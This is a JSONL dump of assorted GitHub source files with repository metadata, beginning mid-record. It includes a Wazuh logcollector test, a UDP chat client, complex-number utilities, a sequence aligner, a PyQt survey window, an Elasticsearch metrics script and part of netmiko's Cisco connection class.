\",data)\r\n\r\nprint(str(data)+' UTC'+str(offset))\r\n\r\n\r\na = float(data)/1000.0 \r\n\r\n\r\nsaat = datetime.datetime.fromtimestamp(a).strftime(frmt)\r\nprint(\"Tarih ve Saat: \",saat)\r\n\r\nkmt = kmt + '\"' + saat + '\"'\r\nprint(kmt, 'komut')\r\nos.system(kmt)\r\n\r\ns.close()\r\n","repo_name":"nyucel/blm304","sub_path":"final/170401024/istemci.py","file_name":"istemci.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"tr","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"18382029231","text":"import os\nimport pytest\nimport sys\n\nfrom wazuh_testing.tools import get_service\nfrom wazuh_testing.tools.configuration import load_wazuh_configurations\nimport wazuh_testing.logcollector as logcollector\nimport wazuh_testing.api as api\nfrom wazuh_testing.tools.utils import lower_case_key_dictionary_array\n\n\n# Marks\npytestmark = pytest.mark.tier(level=0)\n\n# Configuration\n\ntest_data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')\nconfigurations_path = os.path.join(test_data_path, 'wazuh_basic_configuration.yaml')\n\nlocal_internal_options = {'logcollector.remote_commands': '1', 'logcollector.debug': '2', 'windows.debug': '2'}\n\nwazuh_component = get_service()\n\nif sys.platform == 'win32':\n command = 'tasklist'\n no_restart_windows_after_configuration_set = True\nelif sys.platform == 'darwin':\n command = 'ps aux'\nelif sys.platform == 'sunos5':\n command = 'ps aux -xww' \nelse:\n command = 'ps -aux'\n\n\nparameters = [\n {'LOG_FORMAT': 'command', 'COMMAND': f'{command}', 'ALIAS': 'alias'},\n {'LOG_FORMAT': 'full_command', 'COMMAND': f'{command}', 'ALIAS': 'alias2'}\n]\n\nmetadata = lower_case_key_dictionary_array(parameters)\n\nconfigurations = load_wazuh_configurations(configurations_path, __name__,\n params=parameters,\n metadata=metadata)\nconfiguration_ids = [f\"{x['log_format']}_{x['command']}_{x['alias']}\" for x in metadata]\n\n\n# Fixtures\n@pytest.fixture(scope=\"module\", params=configurations, ids=configuration_ids)\ndef get_configuration(request):\n \"\"\"Get configurations from the module.\"\"\"\n return request.param\n\n\n@pytest.mark.filterwarnings('ignore::urllib3.exceptions.InsecureRequestWarning')\ndef test_configuration_alias(configure_local_internal_options_module,\n get_configuration, configure_environment, file_monitoring, restart_logcollector):\n '''\n description: Check if the 'wazuh-logcollector' daemon changes a command name in the log messages by\n the one defined in the 'alias' tag. For this purpose, the test will monitor a command\n using an alias. Then, it will verify that the 'reading command' event is generated.\n This event includes the output of the command executed and its alias. Finally, the test\n will verify that the Wazuh API returns the same values for the 'localfile' section that\n the configured one.\n\n wazuh_min_version: 4.2.0\n\n tier: 0\n\n parameters:\n - configure_local_internal_options_module:\n type: fixture\n brief: Configure the Wazuh local internal options.\n - get_configuration:\n type: fixture\n brief: Get configurations from the module.\n - configure_environment:\n type: fixture\n brief: Configure a custom environment for testing.\n - file_monitoring:\n type: fixture\n brief: Handle the monitoring of a specified file.\n - restart_logcollector:\n type: fixture\n brief: Clear the 'ossec.log' file and start a new monitor.\n\n assertions:\n - Verify that the logcollector monitors a command with an assigned alias.\n - Verify that the Wazuh API returns the same values for the 'localfile' section as the configured one.\n\n input_description: A configuration template (test_basic_configuration_alias) is contained in an external YAML file\n (wazuh_basic_configuration.yaml). That template is combined with two test cases defined\n in the module. Those include configuration settings for the 'wazuh-logcollector' daemon.\n\n expected_output:\n - r'Reading command message.*'\n\n tags:\n - logs\n '''\n cfg = get_configuration['metadata']\n\n log_callback = logcollector.callback_command_alias_output(cfg['alias'])\n log_monitor.start(timeout=10, callback=log_callback,\n error_message=logcollector.GENERIC_CALLBACK_ERROR_COMMAND_MONITORING)\n\n if wazuh_component == 'wazuh-manager':\n api.wait_until_api_ready()\n api.compare_config_api_response([cfg], 'localfile')\n","repo_name":"wazuh/wazuh-qa","sub_path":"tests/integration/test_logcollector/test_configuration/test_basic_configuration_alias.py","file_name":"test_basic_configuration_alias.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"6829396604","text":"import socket\nimport threading\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsocketAddress = ('172.18.109.20', 12345)\n\n\n\ndef listen():\n while True:\n message, address = s.recvfrom(1024)\n l = message.decode().split('^')\n if len(l) == 1:\n printToConsole(message.decode())\n else:\n printToConsole(l[1] + \" : \" + l[0])\n \n\ndef printToConsole(message):\n print(\"\\n\", message)\n\ndef handleInput():\n name = input(\"Enter you name:\")\n s.sendto(name.encode(), socketAddress)\n\n while True:\n snd = input(\"Message: \")\n s.sendto(snd.encode(), socketAddress)\n\nt1 = threading.Thread(target=listen)\nt2 = threading.Thread(target=handleInput)\n\n\nt1.start()\nt2.start()\n\nt1.join()\nt2.join()\n\n","repo_name":"shaheen-senpai/S7DSLAB","sub_path":"Sent Nuclear Codes/ash_client.py","file_name":"ash_client.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9756805331","text":"from domain.complex_numbers import *\n\ndef sequence_sum(numbers, first, last):\n '''input numbers -obiect de tip lista de numere complexe\n first - prima pozitie din secventa\n last - ultima pozitie din secventa\n output: -returneaza suma, un numar complex\n '''\n real = 0\n imag = 0\n while first <= last:\n real += numbers.get_number(first).real\n imag += numbers.get_number(first).imag\n first += 1\n return complex(real, imag)\n\ndef sequence_product(numbers, first, last):\n '''input numbers -obiect de tip lista de numere complexe\n first - prima pozitie din secventa\n last - ultima pozitie din secventa\n output: -returneaza produsul, un numar complex\n '''\n real = numbers.get_number(first).real\n imag = numbers.get_number(first).imag\n first += 1\n while first <= last:\n number = numbers.get_number(first)\n new_real = real * number.real - imag * number.imag\n new_imag = real * number.imag + imag * number.real\n real = new_real\n imag = new_imag\n first += 1\n return complex(real, imag)\n\ndef descending_imaginary(numbers):\n '''input numbers -obiect de tip lista de numere complexe\n output: -returneaza lista in ordine descrescatoare dupa nr imaginare\n '''\n copy = numbers.get_all_numbers()\n poz = -1\n for i in range(numbers.get_size()):\n for j in range(i + 1, numbers.get_size()):\n if (copy[i].imag > copy[j].imag):\n aux = copy[i]\n copy[i] = copy[j]\n copy[j] = aux\n return copy\n\ndef test_sequence_product():\n numbers = Complex_Numbers([[1,2], [3,4], [5,6]])\n assert sequence_sum(numbers, 0, 2) == complex(9, 12)\n assert sequence_sum(numbers, 0, 1) == complex(4, 6)\n assert sequence_sum(numbers, 0, 0) == complex(1, 2)\n\ndef test_sequence_sum():\n numbers = Complex_Numbers([[1,2], [3,4], [5,6]])\n assert sequence_product(numbers, 0, 2) == complex(-85, 20)\n assert sequence_product(numbers, 0, 1) == complex(-5, 10)\n assert sequence_product(numbers, 0, 0) == complex(1, 2)\n\ndef test_descending_imaginary():\n numbers = Complex_Numbers([[0, 1], [5, 0], [-1, 9]])\n assert(descending_imaginary(numbers) == [complex(5, 0), complex(0, 1), complex(-1, 9)])\n numbers = Complex_Numbers([[5 ,0], [0, 1], [-1, 9]])\n assert(descending_imaginary(numbers) == [complex(5, 0), complex(0, 1), complex(-1, 9)])\n","repo_name":"mirtleonard/ComplexNumbers","sub_path":"utils/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7039803117","text":"import cv2\nimport keras\nimport os\nimport math_parser\nimport numpy as np\nfrom symbol_locator import write_contour_images\nfrom math_solver import compute\nimport re\nimport sys\nimport shutil\n\n\ndef natural_sort(l):\n convert = lambda text: int(text) if text.isdigit() else text.lower()\n alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]\n return sorted(l, key=alphanum_key)\n\n\ndef solve_photo(image):\n tmp_dir = 'tmp_images'\n os.mkdir(tmp_dir)\n write_contour_images(image, tmp_dir)\n\n model = keras.models.load_model(\"math_model\")\n label_array = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '-', '*', '/', '(', ')']\n expression = ''\n for _, _, files in os.walk(tmp_dir):\n files = natural_sort(files)\n for file in files:\n image = cv2.imread(\"%s/%s\" % (tmp_dir, file))\n image = image.astype('float32')\n image /= 255\n x = np.expand_dims(image, axis=0)\n labels = model.predict(x)\n label = np.argmax(labels)\n char = label_array[label]\n expression += char\n\n shutil.rmtree(tmp_dir)\n try:\n p = math_parser.parse(expression)\n except:\n return \"error parsing photo content\"\n return compute(p)\n\n\nif __name__ == \"__main__\":\n image = cv2.imread(sys.argv[1])\n print(solve_photo(image))\n","repo_name":"simepavlic/math-solver","sub_path":"photo_solver.py","file_name":"photo_solver.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43517386628","text":"import numpy as np\n\n\ndef __fill_matrix(chain_a, chain_b, similarity_func, gap_penalty = -1):\n matrix = np.zeros((len(chain_a) + 1, len(chain_b) + 1))\n\n for i in range(len(chain_a) + 1):\n matrix[i][0] = gap_penalty * i\n\n for j in range(len(chain_b) + 1):\n matrix[0][j] = gap_penalty * j\n\n for i in range(0, len(chain_a)):\n for j in range(0, len(chain_b)):\n match = matrix[i][j] + similarity_func(chain_a[i], chain_b[j])\n delete = matrix[i][j + 1] + gap_penalty\n insert = matrix[i + 1][j] + gap_penalty\n matrix[i + 1][j + 1] = max(match, delete, insert)\n\n return matrix\n\n\ndef __trace_back(chain_a, chain_b, matrix, similarity, gap_penalty = -1):\n alignment_a = \"\"\n alignment_b = \"\"\n i = len(chain_a) - 1\n j = len(chain_b) - 1\n while i >= 0 or j >= 0:\n if i >= 0 and j >= 0 and matrix[i + 1][j + 1] == matrix[i][j] + similarity(chain_a[i], chain_b[j]):\n alignment_a = chain_a[i] + alignment_a\n alignment_b = chain_b[j] + alignment_b\n i -= 1\n j -= 1\n elif i >= 0 and matrix[i+1][j+1] == matrix[i][j + 1] + gap_penalty:\n alignment_a = chain_a[i] + alignment_a\n alignment_b = \"-\" + alignment_b\n i -= 1\n\n else:\n alignment_a = \"-\" + alignment_a\n alignment_b = chain_b[j] + alignment_b\n j -= 1\n\n return alignment_a, alignment_b\n\n\ndef needleman_wunsch(chain_a, chain_b, similarity_func, gap_penalty = -1, print_matrix=False):\n matrix = __fill_matrix(chain_a, chain_b, similarity_func, gap_penalty=gap_penalty)\n if print_matrix:\n print(len(matrix[0]))\n\n aligments = __trace_back(chain_a, chain_b, matrix, similarity_func, gap_penalty=gap_penalty)\n score = matrix[-1][-1]\n return aligments, score\n","repo_name":"sovavladislav/bioinformatics-algorithms","sub_path":"needleman_wunsch.py","file_name":"needleman_wunsch.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21728556186","text":"import sys\nimport csv\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QHBoxLayout, QVBoxLayout, QLabel\n\nNUM_SEQUENCES = 50\n\ndef getSequence(path):\n seq = []\n with open(path+\"seq.csv\", \"r\", newline=\"\") as f:\n reader = csv.reader(f)\n for row in reader:\n seq.append((int(row[0]), int(row[1])))\n return seq\n\n\nclass AssessmentWindow(QWidget):\n def __init__(self, imgPath, humanNo, seq, seqNum):\n super().__init__()\n self.imgPath = imgPath\n self.humanNo = humanNo\n self.leftBtn = None\n self.rightBtn = None\n self.seq = seq\n self.seqNum = seqNum\n self.leftLegoNo, self.rightLegoNo = seq[seqNum]\n self.go()\n\n\n def go(self):\n self.setGeometry(400, 0, 500, 800)\n self.setWindowTitle(\"Preference\")\n\n vOuter = QVBoxLayout()\n vOuter.addStretch(1)\n vOuter.addLayout(self.display_human(imgPath))\n vOuter.addLayout(self.display_lego(imgPath))\n vOuter.addStretch(1)\n\n self.setLayout(vOuter)\n self.show()\n\n\n def writeResult(self, result):\n with open(self.imgPath+\"result.csv\", \"a\", newline=\"\") as f:\n writer = csv.writer(f)\n writer.writerow(result)\n\n\n def next(self):\n if self.seqNum < NUM_SEQUENCES - 1:\n newWindow = AssessmentWindow(self.imgPath, humanNo=self.humanNo,\n seq=self.seq, seqNum=self.seqNum+1)\n\n\n def register(self, leftClicked):\n if leftClicked:\n print(\"left\")\n self.writeResult((self.leftLegoNo, self.rightLegoNo))\n self.next()\n self.close()\n pass\n else:\n print(\"right\")\n self.writeResult((self.rightLegoNo, self.leftLegoNo))\n self.next()\n self.close()\n pass\n\n\n def display_lego(self, imgPath):\n self.leftBtn = QPushButton(\"left\", self)\n self.rightBtn = QPushButton(\"right\", self)\n\n self.leftBtn.clicked.connect(lambda : self.register(True))\n self.rightBtn.clicked.connect(lambda : self.register(False))\n\n vBox1 = QVBoxLayout()\n label = QLabel(self)\n png = QPixmap(imgPath + \"lego_male/face\" + str(self.leftLegoNo) + \".png\")\n label.setPixmap(png)\n vBox1.addStretch(1)\n vBox1.addWidget(label)\n vBox1.addWidget(self.leftBtn)\n vBox1.addStretch(1)\n\n vBox2 = QVBoxLayout()\n label = QLabel(self)\n png = QPixmap(imgPath + \"lego_male/face\" + str(self.rightLegoNo) + \".png\")\n label.setPixmap(png)\n vBox2.addStretch(1)\n vBox2.addWidget(label)\n vBox2.addWidget(self.rightBtn)\n vBox2.addStretch(1)\n\n hBoxFaces = QHBoxLayout()\n hBoxFaces.addStretch(1)\n hBoxFaces.addLayout(vBox1)\n hBoxFaces.addLayout(vBox2)\n hBoxFaces.addStretch(1)\n\n hBoxLabel = QHBoxLayout()\n hBoxLabel.addStretch(1)\n label = QLabel(self)\n label.setText(\"Session \" + str(self.seqNum) + \": Choose the one you think is the best match!\")\n hBoxLabel.addWidget(label)\n hBoxLabel.addStretch(1)\n\n vOuter = QVBoxLayout()\n vOuter.addStretch(1)\n vOuter.addLayout(hBoxLabel)\n vOuter.addLayout(hBoxFaces)\n vOuter.addStretch(1)\n\n return vOuter\n\n\n def display_human(self, imgPath):\n vBox = QVBoxLayout()\n img = QLabel(self)\n png = QPixmap(imgPath+\"human\"+ str(self.humanNo) +\".png\", \"1\")\n img.setPixmap(png.scaledToHeight(400))\n\n label = QLabel(self)\n label.setText(\"Target Face:\")\n\n vBox.addStretch(1)\n vBox.addWidget(label)\n vBox.addWidget(img)\n vBox.addStretch(1)\n\n hBox = QHBoxLayout()\n hBox.addStretch(1)\n hBox.addLayout(vBox)\n hBox.addStretch(1)\n\n return hBox\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n imgPath = sys.argv[1]\n # print(imgPath)\n\n window = AssessmentWindow(imgPath, humanNo=0, seq=getSequence(imgPath), seqNum=0)\n\n sys.exit(app.exec_())","repo_name":"PeterBoxXu/pspa","sub_path":"display_qt5.py","file_name":"display_qt5.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36506202900","text":"#! !/usr/bin/env python3\n\nfrom pprint import pprint\n\nfrom elasticsearch import Elasticsearch \nfrom elasticsearch_dsl import Search\n\nimport datetime\nimport dateutil.parser\nfrom collections import defaultdict\n\nimport set_params\n\nimport argparse\nimport sys\nimport os\nimport csv\nfrom csv import DictWriter\nimport json\nfrom filelock import Timeout, FileLock\n\nfrom conf import *\n\n\ndef milisec2iso(milliseconds):\n\ttime0 = dateutil.parser.isoparse('1970-01-01T00:00:00')\n\tdelta = datetime.timedelta(milliseconds=milliseconds)\n\treturn time0 + delta\n\ndef iso2milisec(iso):\n\tdelta = dateutil.parser.isoparse(iso) - dateutil.parser.isoparse('1970-01-01T00:00:00')\n\tdelta = delta.total_seconds() * 1000\n\treturn delta\n\ndef query(es, owner_repo, start_date_str):\n\t\n\tgit = BACKENDS['git']\n\tgithub_issue = BACKENDS['github:issue']\n\tgithub_repo = BACKENDS['github:repo']\n\n\tgit_aoc = STUDIES['enrich_onion:git']\n\tgit_onion = STUDIES['enrich_onion:git']\n\n\tnew_owner_repo = set_params.replace_name(owner_repo)\n\tresults = {'owner_repo':owner_repo}\n\tpop_list = []\n\tdomain_author_count = {}\n\tqueries = []\n\n\tif git:\n\t\tdef S_git():\n\t\t\ts = Search(using=es, index='git_enriched')\n\t\t\ts = s.update_from_dict({'query':{'bool': {'must':[\n\t\t\t\t\t\t\t\t\t\t\t\t{'term' : {'Author_bot' : 'false'}},\n\t\t\t\t\t\t\t\t\t\t\t\t{'term' : {'Commit_bot' : 'false'}},\n\t\t\t\t\t\t\t\t\t\t\t\t{'term' : {'github_repo' : owner_repo}}]}}})\n\t\t\treturn s\n\n\t\tdef S_git_recent():\n\t\t\ts = S_git()\n\t\t\ts = s.query('range', **{'grimoire_creation_date':{'gt':start_date_str}})\n\t\t\treturn s\n\n\t\tqueries.append((S_git(), 'first_commit_date', 'min', 'commit_date'))\n\t\tqueries.append((S_git(), 'last_commit_date', 'max', 'commit_date'))\n\t\tqueries.append((S_git(), 'num_added', 'sum', 'lines_added'))\n\t\tqueries.append((S_git(), 'num_removed', 'sum', 'lines_removed'))\n\t\tqueries.append((S_git_recent(), 'num_authors', 'cardinality', 'author_uuid'))\n\t\tqueries.append((S_git_recent(), 'num_committers', 'cardinality', 'Commit_uuid'))\n\t\tqueries.append((S_git_recent(), 'num_domains', 'cardinality', 'Author_domain'))\n\t\tqueries.append((S_git_recent(), 'time_to_commit_hours', 'avg', 'time_to_commit_hours'))\n\t\tqueries.append((S_git_recent(), 'num_changed', 'sum', 'lines_changed'))\n\n\t\ts = S_git_recent()\n\t\tresults['num_commits'] = s.count()\n\n\n\t\t#s = S_git()\n\t\t#s = s.query('bool', **{'must_not':{'term':{'author_domain': 'Unknown'}}})\n\t\t#s.aggs.bucket('num_authors_of_domain', 'terms', field = 'author_domain').metric('domain_author_count', 'cardinality', field = 'author_uuid')\n\t\t#s = s.execute()\n\t\t#buckets = s.aggregations.num_authors_of_domain.buckets\n\t\t#domain_author_count = {}\n\t\t#for domain in buckets:\n\t\t#\tdomain_author_count[domain['key']] = domain['domain_author_count']['value']\n\n\tif git_aoc:\n\t\tdef S_aoc():\n\t\t\ts = Search(using=es, index='git-aoc_enriched')\n\t\t\ts = s.query('term', **{'project' : owner_repo})\n\t\t\treturn s\n\n\t\ts = S_aoc()\n\t\ts1 = s.query('term', **{'fileaction':'FILE_A'})\n\t\tnum_added_files = s1.count()\n\t\ts2 = s.query('term', **{'fileaction':'FILE_D'})\n\t\tnum_deleted_files = s2.count()\n\t\tresults['num_files'] = num_added_files - num_deleted_files\n\n\tif git_onion:\n\t\tdef S_git_onion():\n\t\t\ts = Search(using=es, index='git-onion_enriched')\n\t\t\ts = s.query('term', **{'project' : owner_repo})\n\t\t\treturn s\n\n\t\ts = S_git_onion()\n\t\ts.aggs.metric('num_quater', 'cardinality', field = 'grimoire_creation_date')\n\t\ts = s.execute()\n\t\tnum_quater = s.aggregations.num_quater.value\n\n\t\tif num_quater == 0:\n\t\t\tnum_core = num_regular = num_casual = 0\n\t\telse:\n\t\t\ts = S_git_onion()\n\t\t\ts1 = s.query('term', **{'onion_role':'core'})\n\t\t\tnum_core = s1.count() / num_quater\n\n\n\t\t\ts = S_git_onion()\n\t\t\ts2 = s.query('term', **{'onion_role':'regular'})\n\t\t\tnum_regular = s2.count() / num_quater\n\n\n\t\t\ts = S_git_onion()\n\t\t\ts3 = s.query('term', **{'onion_role':'casual'})\n\t\t\tnum_casual = s3.count() / num_quater\n\n\t\tresults['num_core'], results['num_regular'], results['num_casual'] = num_core, num_regular, num_casual\n\n\t# github-issue\n\tif github_issue:\n\t\tdef S_github():\n\t\t\ts = Search(using=es, index='github-issue_enriched')\n\t\t\ts = s.update_from_dict({'query':{'bool': {'must':[\n\t\t\t\t\t\t\t\t\t\t\t{'term' : {'author_bot' : 'false'}},\n\t\t\t\t\t\t\t\t\t\t\t{'term' : {'assignee_data_bot' : 'false'}},\n\t\t\t\t\t\t\t\t\t\t\t{'term' : {'github_repo' : owner_repo}}]}}})\n\t\t\treturn s\n\n\t\tqueries.append((S_github(), 'time_to_first_attention', 'avg', 'time_to_first_attention'))\n\t\tqueries.append((S_github(), 'num_issue_authors', 'cardinality', 'author_uuid'))\n\t\tqueries.append((S_github(), 'num_issue_domains', 'cardinality', 'author_domain'))\n\n\t\tdef S_item_state(state, item_type):\n\t\t\ts = S_github()\n\t\t\ts = s.query('term', **{'state':state})\n\t\t\ts = s.query('term', **{'item_type': item_type})\n\t\t\treturn s\n\n\t\tfield = {'closed': 'time_to_close_days', 'open': 'time_open_days'}\n\t\tnum_item_state = defaultdict(lambda:{})\n\t\ttime_item_state = defaultdict(lambda:{})\n\t\t\n\t\ttransfer = {'issue':'issue', 'pull request':'pr'}\n\t\tfor state in ['closed', 'open']:\n\t\t\tfor item_type in ['issue', 'pull request']:\n\t\t\t\ts = S_item_state(state, item_type)\n\t\t\t\tresults['num_'+state+'_'+transfer[item_type]] = s.count()\n\t\t\t\ts.aggs.metric(field[state], 'avg', field = field[state])\n\t\t\t\ts = s.execute()\n\t\t\t\tresults['time_'+state+'_'+transfer[item_type]] = s.aggregations[field[state]].value\n\t\t\n\t\tfor item_type in ['issue', 'pull request']:\n\t\t\tfor field_name in ['created_at', 'updated_at']:\n\t\t\t\tqueries.append((S_github().query('term', **{'item_type': item_type}), 'last_'+field_name[:8]+transfer[item_type]+'_date', 'max', field_name))\n\n\t#github-repo\n\tif github_repo:\n\t\ts = Search(using=es, index='github-repo_raw')\n\t\ts = s.query('term', **{'data.full_name':owner_repo})\n\t\ts = s.execute()\n\t\ts = s[-1]['data']\n\t\tresults['size'] = s['size']\n\t\tresults['num_stars'] = s['stargazers_count']\n\t\tresults['num_forks'] = s['forks_count']\n\t\tresults['num_subscribers'] = s['subscribers_count']\n\t\tresults['num_total_open_issues'] = s['open_issues_count']\n\t\tresults['num_repos'] = s['owner_repos_count'] \n\t\tresults['num_followers'] = s['followers_count']\n\n\n\tfor source, name, function_name, field_name in queries:\n#\t\tprint(source, name, function_name, field_name)\n\t\ts = source\n\t\ts.aggs.metric(name, function_name, field=field_name)\n\t\ts = s.execute()\n\t\tresults[name] = s.aggregations[name].value\n\n\tif git:\n\t\tresults['age'] = datetime.datetime.now().timestamp()*1000 - results['first_commit_date']\n\t\tresults['num_lines'] = results['num_added']- results['num_removed']\n\t\n\n\tif IF_PRINT:\n\t\tprint(results)\n#\t\tprint('Age: ', datetime.timedelta(milliseconds=results['age']).days, 'days')\n#\t\tprint(\"Number of lines: \", results['num_lines'])\n#\t\tprint('Date of the first commit:', milisec2iso(results['first_commit_date']) if results['first_commit_date'] is not None else None)\n#\t\tprint('Date of the latest commit:', milisec2iso(results['last_commit_date']) if results['last_commit_date'] is not None else None)\n#\t\tprint(\"Number of commits: \", results['num_commits'])\n#\t\tprint(\"Number of unique authors: \", results['num_authors'])\n#\t\tprint(\"Number of unique committers: \", results['num_committers'])\n#\t\tprint(\"Number of unique author domains: \", results['num_domains'])\n#\t\tprint(\"Time to commit hours : \", results['time_to_commit_hours'])\n#\t\tprint(\"Number of changed lines: \", results['num_changed'])\n#\t\tprint(\"Number of files: \", results['num_files'])\n#\t\tprint('Number of core member each quater: ', results['num_core'])\n#\t\tprint('Number of regular member each quater: ', results['num_regular'])\n#\t\tprint('Number of casual results member each quater: ', results['num_casual'])\n#\t\tprint('Size of Github: ', results['size'])\n#\t\tprint('Number of stars: ', results['num_stars'])\n#\t\tprint('Number of forks: ', results['num_forks'])\n#\t\tprint('Number of subscribers: ', results['num_subscribers'])\n#\t\tprint('Number of total open issues: ', results['num_total_open_issues'])\n#\t\tprint(\"Time to first attention: \", results['time_to_first_attention'])\n#\t\tprint(\"Number of unique issue authors: \", results['num_issue_authors'])\n#\t\tprint(\"Number of unique issue author domains: \", results['num_issue_domains'])\n#\t\tprint('Date of he latest pull request:', milisec2iso(results['last_created_pr_date']) if results['last_created_pr_date'] is not None else None)\n#\t\tprint('Date of the latest issue:', milisec2iso(results['last_created_issue_date']) if results['last_created_issue_date'] is not None else None)\n#\t\tprint('Number of closed issue: ', results['num_closed_issue'] )\n#\t\tprint('Time of open days for issue: ', results['time_open_issue'] )\n\n\n\tpop_list=['num_added', 'num_removed', 'first_commit_date']\n\tfor name in pop_list:\n\t\tif name in results: \n\t\t results.pop(name)\n\n\treturn results#, domain_author_count\n\ndef get_params_parser():\n \"\"\"Parse command line arguments\"\"\"\n\n parser = argparse.ArgumentParser(add_help=False)\n\n parser.add_argument('-e', '--es_paths', dest='es_paths', nargs='*', required=True,\n help='es')\n parser.add_argument('-o', '--owner_repo', dest='owner_repo', required=True,\n help='owner_repo')\n parser.add_argument('-s', '--start_date_str', dest='start_date_str', default='1970-01-01T00:00:00',\n help='start_date_str')\n parser.add_argument('-c', '--columns', dest='columns', nargs='*', required=True,\n help='columns')\n parser.add_argument('-i', '--IF_PRINT', dest='IF_PRINT', default=False,\n help='IF_PRINT')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n return parser\n\n\ndef get_params():\n \"\"\"Get params to execute query\"\"\"\n\n parser = get_params_parser()\n args = parser.parse_args()\n return args\n\nclass save_result:\n\tdef __init__(self, result_path, lock_path):\n\t\tself.result_path = result_path\n\t\tself.lock_path = lock_path\n\n\tdef append_dict_as_row(self, file_name, dict_of_elem, field_names):\n\t # Open file in append mode\n\t\tlock = FileLock(self.lock_path + file_name + \".lock\")\n\t\twith lock:\n\t\t with open(self.result_path + file_name, 'a+', newline='') as write_obj:\n\t\t # Create a writer object from csv module\n\t\t dict_writer = DictWriter(write_obj, fieldnames=field_names)\n\t\t # Add dictionary as wor in the csv\n\t\t dict_writer.writerow(dict_of_elem)\n\n\tdef append_dict_to_json(self, file_name, dict_of_elem):\n\t\tlock = FileLock(self.lock_path + file_name + \".lock\")\n\t\twith lock:\n\t\t\twith open(self.result_path + file_name, \"r+\") as file:\n\t\t\t\tjson_data = json.load(file)\n\t\t\t\tjson_data.update(dict_of_elem)\n\t\t\t\tfile.seek(0)\n\t\t\t\tjson.dump(json_data, file, indent=4)\n\n\tdef append_line(self, file_name, line):\n\t\tlock = FileLock(self.lock_path + file_name + \".lock\")\n\t\twith lock:\n\t\t\twith open(self.result_path + file_name, \"a\") as file:\n\t\t\t\tfile.write(line + '\\n')\n\n\ndef remove_settings(es, new_owner_repo):\n\t# es.indices.delete(index='git_raw', ignore=[400, 404])\n\t# es.indices.delete(index='github-issue_raw', ignore=[400, 404])\n\t# es.indices.delete(index='github-repo_enriched', ignore=[400, 404])\n\tos.remove('settings/projects/project_' + new_owner_repo + '.json')\n\tos.remove('settings/setups/setup_'+ new_owner_repo +'.cfg')\n\ndef run(owner_repo, start_date_str, columns):\n\tes = Elasticsearch(ES_PATHS)\n\n\tdata = query(es, owner_repo, start_date_str)\n\n\tsave_result_obj = save_result(result_path = 'result/', lock_path = 'lock/')\n\tsave_result_obj.append_dict_as_row('data.csv', data, columns)\n\t#save_result_obj.append_dict_to_json('domain_author_count.json', {owner_repo : domain_author_count})\n\n\tnew_owner_repo = set_params.replace_name(owner_repo)\n\tremove_settings(es, new_owner_repo)\n\nif __name__ == '__main__':\n\targs = get_params()\n\tes = Elasticsearch(args.es_paths)\n\t\n\tnew_owner_repo = set_params.replace_name(args.owner_repo)\n\t\n\tdata, domain_author_count = query(es, args.owner_repo, args.start_date_str, args.IF_PRINT)\n\n\tappend_dict_as_row('result/data.csv', data, args.columns)\n\tappend_dict_to_json('result/domain_author_count.json', {args.owner_repo : domain_author_count})\n\n\tnew_owner_repo = set_params.replace_name(args.owner_repo)\n\tremove_settings(new_owner_repo)\n\n#\tIF_PRINT = True\n#\tfor repo in ['git-up/GitUp']:\n# \t\tquery(Elasticsearch(ES_PATHS), repo,'2020-01-01')\n\n# print(query('chaoss/grimoirelab','2020-03-30',True).keys())\n# a = \"size, age, num_lines, num_files, num_stars, num_forks, num_subscribers, num_total_open_issues, num_core, num_regular, num_casual, \\\n# \tnum_commits, num_authors, num_committers, num_domains, num_changed, num_closed_issue, num_closed_pr, num_open_issue, num_open_pr, \\\n# \tlast_commit_date, last_pr_date, last_issue_date, time_to_commit_hours, time_to_first_attention, time_to_close_days_issue, time_to_close_days_pr, time_open_days_issue, time_open_days_pr\"\n# a = a.replace('\\t', '')\n# # b = a.replace(\"['issue']\", \"_issue\").replace(\"['pull request']\", \"_pr\")\n# b = a.split(', ')\n# print(b)\\\n","repo_name":"Julianbaozi/github-repository-importance","sub_path":"query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":12781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34058518190","text":"\"\"\"CiscoBaseConnection is netmiko SSH class for Cisco and Cisco-like platforms.\"\"\"\nfrom typing import Optional\nimport re\nimport time\nfrom netmiko.base_connection import BaseConnection\nfrom netmiko.scp_handler import BaseFileTransfer\nfrom netmiko.exceptions import NetmikoAuthenticationException\n\n\nclass CiscoBaseConnection(BaseConnection):\n \"\"\"Base Class for cisco-like behavior.\"\"\"\n\n def check_enable_mode(self, check_string: str = \"#\") -> bool:\n \"\"\"Check if in enable mode. Return boolean.\"\"\"\n return super().check_enable_mode(check_string=check_string)\n\n def enable(\n self,\n cmd: str = \"enable\",\n pattern: str = \"ssword\",\n enable_pattern: Optional[str] = None,\n check_state: bool = True,\n re_flags: int = re.IGNORECASE,\n ) -> str:\n \"\"\"Enter enable mode.\"\"\"\n return super().enable(\n cmd=cmd,\n pattern=pattern,\n enable_pattern=enable_pattern,\n check_state=check_state,\n re_flags=re_flags,\n )\n\n def exit_enable_mode(self, 